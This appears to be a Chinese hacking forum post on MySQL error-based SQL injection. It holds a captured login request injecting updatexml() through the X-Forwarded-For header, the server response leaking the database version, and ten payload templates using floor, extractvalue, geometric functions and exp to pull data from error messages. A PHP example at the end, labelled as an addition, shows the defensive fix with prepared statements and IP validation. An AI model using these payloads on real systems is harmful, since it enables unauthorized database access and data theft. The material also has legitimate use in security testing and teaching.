MySQL error-based injection - 女黑客 - Powered by Discuz! Archiver

nvhack posted on 2017-4-11 11:32:52

MySQL error-based injection

POST /Model/admin/login.php?action=login HTTP/1.1
Host: XXX.com
X-Forwarded-For: ' or updatexml(1,concat(0x7e,(version())),0) or'
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://XXX.com/Model/admin/login.php
Cookie: PHPSESSID=i2m9hu9jtm8l4o71hvct9h0h05
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

username=abc&password=123

Response:
HTTP/1.1 200 OK
Server: kangle/3.5.8.2
Date: Tue, 11 Apr 2017 03:21:49 GMT
X-Powered-By: PHP/5.4.45
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html
Connection: close
Content-Length: 540


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />MySQL Query:insert into dg_logs(adminid,admin,type,addtime,ip,memo) values('22','abc','0','1491880909','' or updatexml(1,concat(0x7e,(version())),0) or'','管理员abc登录后台') <br> MySQL Error:XPATH syntax error: '~10.1.16-MariaDB' <br> MySQL Errno:1105 <br> Message:MySQL Query Error
1. floor()
select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
http://images2015.cnblogs.com/blog/1016026/201609/1016026-20160928204840594-1429421338.png

2. extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
http://images2015.cnblogs.com/blog/1016026/201609/1016026-20160928205421297-407989251.png

3. updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
http://images2015.cnblogs.com/blog/1016026/201609/1016026-20160928205451969-1920882857.png

4. geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
http://images2015.cnblogs.com/blog/1016026/201609/1016026-20160928205719485-521701933.png

5. multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
http://images2015.cnblogs.com/blog/1016026/201609/1016026-20160928205942266-563740245.png

6. polygon()
select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
http://images2015.cnblogs.com/blog/1016026/201609/1016026-20160928205828281-760176387.png

7. multipolygon()
select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
http://images2015.cnblogs.com/blog/1016026/201609/1016026-20160928210038094-1420034123.png

8. linestring()
select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
http://images2015.cnblogs.com/blog/1016026/201609/1016026-20160928210144438-1099086559.png

9. multilinestring()
select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
http://images2015.cnblogs.com/blog/1016026/201609/1016026-20160928210420750-344279412.png

10. exp()
select * from test where id=1 and exp(~(select * from(select user())a));
http://images2015.cnblogs.com/blog/1016026/201609/1016026-20160928210533313-2028104812.png
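
A hardened form of the logging step that the capture above exposes, where the X-Forwarded-For value was concatenated into the `insert into dg_logs` statement and the database error was echoed back. This is an added example, not code from the original post or from the application: `TRUSTED_PROXIES`, `client_ip()` and `log_login()` are hypothetical names, the proxy address is made up, and in-memory SQLite stands in for MySQL so the snippet runs offline. The constructed request sends the header from the capture directly, so the header is ignored and the socket peer address is what gets logged.

```php
<?php
// Table and column names come from the query in the error output above;
// TRUSTED_PROXIES, client_ip() and log_login() are hypothetical names.
const TRUSTED_PROXIES = ['10.0.0.5']; // assumption: address of your reverse proxy

// Return a syntactically valid IP address, never a raw header string.
function client_ip(array $server)
{
    $peer = isset($server['REMOTE_ADDR']) ? $server['REMOTE_ADDR'] : '';
    if (in_array($peer, TRUSTED_PROXIES, true) && isset($server['HTTP_X_FORWARDED_FOR'])) {
        // A trusted proxy appends the address it saw, so only the last entry counts.
        $parts = explode(',', $server['HTTP_X_FORWARDED_FOR']);
        $candidate = trim(end($parts));
        if (filter_var($candidate, FILTER_VALIDATE_IP) !== false) {
            return $candidate;
        }
    }
    return filter_var($peer, FILTER_VALIDATE_IP) !== false ? $peer : '0.0.0.0';
}

// Bound parameters keep every value out of the SQL text.
function log_login(PDO $db, $adminId, $admin, $ip, $memo)
{
    try {
        $stmt = $db->prepare(
            'INSERT INTO dg_logs (adminid, admin, type, addtime, ip, memo)
             VALUES (?, ?, ?, ?, ?, ?)'
        );
        $stmt->execute([$adminId, $admin, '0', time(), $ip, $memo]);
    } catch (PDOException $e) {
        // Detail goes to the server log; the response never carries the query
        // or the driver message, which is what made the XPATH error readable.
        error_log('dg_logs insert failed: ' . $e->getMessage());
    }
}

// Demo on in-memory SQLite so it runs offline; production would use the MySQL DSN.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE dg_logs (adminid, admin, type, addtime, ip, memo)');

// Constructed request: the header value from the capture, sent straight from a client.
$server = [
    'REMOTE_ADDR' => '203.0.113.7',
    'HTTP_X_FORWARDED_FOR' => "' or updatexml(1,concat(0x7e,(version())),0) or'",
];
log_login($db, 22, 'abc', client_ip($server), 'admin abc logged in');
echo $db->query('SELECT ip FROM dg_logs')->fetchColumn(), "\n";
```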